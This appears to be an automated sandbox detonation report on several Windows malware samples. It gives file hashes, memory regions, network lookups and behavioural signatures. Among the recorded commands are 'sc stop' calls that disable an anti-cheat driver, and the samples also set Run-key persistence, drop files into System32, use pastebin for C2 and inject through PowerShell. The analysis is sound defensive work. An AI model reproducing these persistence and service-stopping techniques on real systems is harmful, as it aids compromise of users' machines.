| SHA512 | 761759ee3c58539d69a0f6b72a3fbefb7e9d6aa06b156177c3cc85dccc1ba4b4d75b04ab10ae6fd0d1c245a40639b4c75a691fad603c3b0ded7199e4f5160f3d |
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
| MD5 | 24e1bf445dba35eacbdbd6257affff85 |
| SHA1 | 0b932be107ccbbba573731ba31aca0531f574230 |
| SHA256 | 823bed65fc09c1c722360baf898532673a9dc6c48c7d2f41294c7bc90c364be3 |
| SHA512 | f4af9ff66d7b75dfe6df9517c04298a87f51fb823fe59db59b39c8e0b84fb555c636b1f6b1b0355f447fab1782a2de4fa375d081f59512b9ed07af6959fa4e73 |
C:\Program Files\7-Zip\Uninstall.exe
| MD5 | 0ebaad2fc30540d65a7a044d92c70ef4 |
| SHA1 | 18ee63bee1eb9b3c046c4e0c73907f4fdce5a253 |
| SHA256 | a351ebddb69c9848a514077fbc99d04ab9402425a5f9cd4b262cea4ea4983200 |
| SHA512 | 2e3aef11f5731918120d98830989965c35ec2ea75b79b1d23b2f8e2ae6e216ca39f3ed72e5d0f9f66a4a3586ddc647d21128f0b7178bf03ba6d61fcddc3ec5df |
C:\Program Files\Java\jdk-1.8\bin\javac.exe
| MD5 | 7a71d0d5aa8a2685225f92805a63a48f |
| SHA1 | 6a0b697d9e58ce083b5e4e59603e66d1efa316c9 |
| SHA256 | 30af3175b2c200fca437b2efcddd4e39f3c57df173922868916af37b97bbe3a8 |
| SHA512 | f95c38d8d379ef0435eed4c4cb48dc3854ecb0b347fa1d2b5d954580e272dcc2bcc35a7693cf827e1bc95973c5d977ce56615c925aed99d51a643078bf1ffe71 |
memory/4532-518-0x0000000140000000-0x0000000140216000-memory.dmp
C:\Program Files\Java\jdk-1.8\bin\javadoc.exe
| MD5 | 4a3eec02d583715f0a7ba9ab5e8b9c2c |
| SHA1 | 52b4cf61dff82b614d05352683e0ffe48c4d95d5 |
| SHA256 | 4e58529d1fe8f67d2e9643e99caec0c79ae9667d17a5ea7e57c6f47d3e6431ff |
| SHA512 | f00bb638dce0ac8d0f98d6a5414efca099f341a61b2d6da6c349de27fe0f6a0805806062eda393862005bf4b130007a6bdbece5dba33011cf93b86b6467982ac |
C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe
| MD5 | f8bfc35216c485c22f940ee49ab31d4b |
| SHA1 | f90d172ea02c4ab08c76b1340a0340f98198a34c |
| SHA256 | bb7b3ca16146a62a2d48f51e9442d2f2f0024fd5b9418d60e33b9d6440cf10c1 |
| SHA512 | 75108dd834b47b5e5fe91a1fb8662b02a4a1a436450cdccdc22e8981263bd7f7ebb0aa5608a5302298787eb8d9c47f42ee2c25759b81fe8f69bd0d01d461b9b0 |
C:\Program Files\Java\jdk-1.8\bin\javah.exe
| MD5 | 811cd7c3309a97ca105718f7c32649c3 |
| SHA1 | 1270503209cad8b73783789bee73db74f6fcb68c |
| SHA256 | 1bed9a23062a72a911352eb23d6590c3304c8d273b2699fd9097bc77c0ce85f3 |
| SHA512 | 661f91d132d2e48d7977aa8ba99d7a38dffd111b3a15f4488871fa2b10fc4c85993aab437e5a2b62a5751db96dc75d7d9b8a053adec5214e79090105458e4a5e |
C:\Program Files\Java\jdk-1.8\bin\java.exe
| MD5 | 63b600b6f3991c15cf947bd51225455a |
| SHA1 | a50ff9ae6f46b3c1078ae3151448d17e3c462e44 |
| SHA256 | 7a71be58046d4cf005d4154a4e64fb02f667c42f03bd892edf24e470bbe6914d |
| SHA512 | ebad2a44600e22e04e4b6e4db9394a584594497beb05aec59e78d5e11c765c679b96679ad5925870c69debeb793e31fe92269f0edd3a4d4377ecc2af89197d32 |
C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe
| MD5 | 65de8044a9237b2b467a421cf7452951 |
| SHA1 | 1d400219868cb15ea2ebd0fae6b285c0b1439537 |
| SHA256 | beacaeeee72f44a7b2cc933e6d645d380bfbe95b0d3fd10dc4d40d56c6067eaf |
| SHA512 | 38ed96e42bdd54504d1de1611fa59717f875ddcbbc6fce8116f9238282b4620cfb3ac708e8d77ca56baa042cc9a8376c9b1c699a7b6245f4e8532d4048a9397d |
C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe
| MD5 | 213f102b007539f49ed0b9277dea7fa0 |
| SHA1 | 40a3afa02055b40967522106680057da45dd328f |
| SHA256 | eab1ff4b2e0594ffed3138ecde49c54f730b371e5f2451c425fdc01f894606ce |
| SHA512 | 06620017cce06bafb40ba7d0c4e36323f8b0fbfb5113d7dfe5e6d967ddf14eb109c928d84051b0947bc2600a098b0fbc77e6a43e5bdc9b40ce16b5885ac273d9 |
C:\Program Files\Java\jdk-1.8\bin\jar.exe
| MD5 | 609b55100b8d74d5afb7b309bdbb6303 |
| SHA1 | 7cb24a21b7b01afc39eb5c57f3034afcc93de8fe |
| SHA256 | 41e2b1876688a141395212d716cda956c70a2605843ff8c71b0bcb0e3370feff |
| SHA512 | cb6cadf9280660a48a97641e4e9c223cf1f702a74ae2f84583d1da3a757fcac7453ed767479cabc29d07af3899714e09c5a56239c42ae2bacbb46b518ab7e154 |
C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe
| MD5 | c5e963321a29f832859ad55ab323a284 |
| SHA1 | 0fb48465cc0287ec93fbe8843af7ea165980f0cc |
| SHA256 | 26862edc468906af6fcb77061a25f88512dc97f7f096561517da9c026cafe719 |
| SHA512 | 7a31b6ba0f5ebf87ab88874fba1df74d3556d3c95d0863dc4773e931f84a369c188d34a9ca02c5dc82ee2c3ec2ab83fce21decc78f4c55b7d75277d54a38f2da |
C:\Program Files\Java\jdk-1.8\bin\idlj.exe
| MD5 | 07ad3925ec9619fb50ed3e594b41cb8a |
| SHA1 | e5f8e015cf135737491213199adfe97f23edf87d |
| SHA256 | 222be3c7431aeeac204bf08ac2757af666d71a53dcb5359ad3f277e2f53a7d82 |
| SHA512 | 7d0e222b2ca2c29f7bf53001418b18b82923b372838b3de9021b217427e885455bef2a1105e460787d46c4c68aa7482a5d22caac57b863583e08cb917f51756a |
C:\Program Files\Java\jdk-1.8\bin\extcheck.exe
| MD5 | cc638206ac38c4e63c22a891e67ec753 |
| SHA1 | ff0924b48d970c982a78c6c9b8b39d2131ea7542 |
| SHA256 | a9532e5122d64935f4681d8a44b8d60b308f2c749381e05c73e58d47688706bc |
| SHA512 | 85292baf9c08d531b4958b99a918f045a97d2cc6767d83cd26d406082d63d6cf46536b5331935e09878c3fb67e721649caefcff33a1b4ac4935dbd3bdde46d56 |
C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe
| MD5 | c8ee84c55ef71ed9e32cce1465766723 |
| SHA1 | 385cfa41b48e86db9ec906245bc1806ceb8334ef |
| SHA256 | be7670eeb8c9e02d1fa09d63b4057a89c376af9820aa1081a0c418f037cd4725 |
| SHA512 | d8ef4943859c5f9961e75542bf537d4ab8e817feb34ae921e59b7a48eae06a2007e1106e55d4f672025694a64a6046996998525ffd4450c2e175b4157e06629f |
memory/564-520-0x0000000140000000-0x0000000140164000-memory.dmp
memory/2216-529-0x0000000140000000-0x0000000140179000-memory.dmp
memory/1816-686-0x0000000140000000-0x0000000140234000-memory.dmp
memory/3712-689-0x0000000140000000-0x000000014022B000-memory.dmp
memory/2272-694-0x0000000140000000-0x000000014015F000-memory.dmp
memory/1736-708-0x0000000140000000-0x0000000140149000-memory.dmp
memory/332-721-0x0000000140000000-0x0000000140134000-memory.dmp
memory/648-726-0x0000000140000000-0x00000001401A1000-memory.dmp
memory/2464-729-0x0000000140000000-0x0000000140169000-memory.dmp
memory/2272-751-0x0000000140000000-0x000000014015F000-memory.dmp
memory/1736-752-0x0000000140000000-0x0000000140149000-memory.dmp
memory/2464-753-0x0000000140000000-0x0000000140169000-memory.dmp
memory/2988-756-0x0000000140000000-0x0000000140179000-memory.dmp
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.jfm
| MD5 | 9841dde4f7291968b910482121f5e634 |
| SHA1 | 9da8e7a5ef97c0bb306058c8479bfc06cbe010b1 |
| SHA256 | a997a8bcd20492be055f574a9be328ff2b638c90b380fd39589b3e1c1859705d |
| SHA512 | bf8a11d00824ed1dd8b5b9bcb8fa1462a354ab57877670b6f5fda6d88cbcb8cb0e68eca5648748f091472cbfbf7ef2cb04bbf98ab08e3cc3d2203d2e66868876 |
memory/2988-825-0x0000000140000000-0x0000000140179000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
95s
Max time network
162s
Command Line
Signatures
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\YuYWieTYcCRlVDzFkxU\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\YuYWieTYcCRlVDzFkxU" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
memory/3356-0-0x00007FF64FB6D000-0x00007FF64FDF6000-memory.dmp
memory/3356-1-0x00007FFEAC830000-0x00007FFEAC832000-memory.dmp
memory/3356-2-0x00007FF64FA40000-0x00007FF6502DF000-memory.dmp
memory/3356-7-0x00007FF64FB6D000-0x00007FF64FDF6000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
91s
Max time network
151s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/5020-0-0x00007FF7405B9000-0x00007FF740923000-memory.dmp
memory/5020-1-0x00007FF837270000-0x00007FF837272000-memory.dmp
memory/5020-2-0x00007FF837280000-0x00007FF837282000-memory.dmp
memory/5020-4-0x00007FF7405B0000-0x00007FF740E63000-memory.dmp
memory/5020-5-0x00007FF7405B9000-0x00007FF740923000-memory.dmp
memory/5020-6-0x00007FF7405B0000-0x00007FF740E63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
165s
Command Line
Signatures
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD2 > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD3 > nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
memory/1204-1-0x00000000016D0000-0x00000000016D1000-memory.dmp
memory/1204-0-0x000000000063A000-0x0000000000BB1000-memory.dmp
memory/1204-2-0x0000000000400000-0x000000000168B000-memory.dmp
memory/1204-4-0x0000000000400000-0x000000000168B000-memory.dmp
memory/1204-5-0x000000000063A000-0x0000000000BB1000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1300 created 628 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\$Node32.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node2Json.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node3Json.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File created | C:\Windows\System32\$Node2Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\$Node32.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File created | C:\Windows\System32\$Node3Json.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1300 set thread context of 324 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\System32\$Node32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2C5C930-ED4B-4A58-B011-C97B23288330}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
